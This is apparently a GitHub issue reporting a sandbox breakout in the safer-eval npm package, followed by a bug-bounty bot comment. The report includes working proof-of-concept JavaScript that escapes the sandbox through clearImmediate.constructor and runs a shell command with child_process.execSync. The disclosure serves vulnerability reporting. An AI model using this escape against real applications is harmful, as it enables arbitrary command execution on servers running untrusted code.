safer-eval icon indicating copy to clipboard operation
safer-eval copied to clipboard
verified publisher icon commenthol

Breakout

Open XmiliaH opened this issue 6 years ago • 1 comments

One can break out of the sandbox with the following code in node:

const saferEval = require("./src/index");

const theFunction = function () {
  const process = clearImmediate.constructor("return process;")();
  return process.mainModule.require("child_process").execSync("whoami").toString()
};
const untrusted = `(${theFunction})()`;

console.log(saferEval(untrusted));

XmiliaH avatar Dec 09 '19 22:12 XmiliaH

👋 Hey! We've recently opened a bug bounty against this issue, so if you want to get rewarded 💰 for fixing this vulnerability 🕷, head over to https://huntr.dev!

huntr-helper avatar Mar 14 '20 09:03 huntr-helper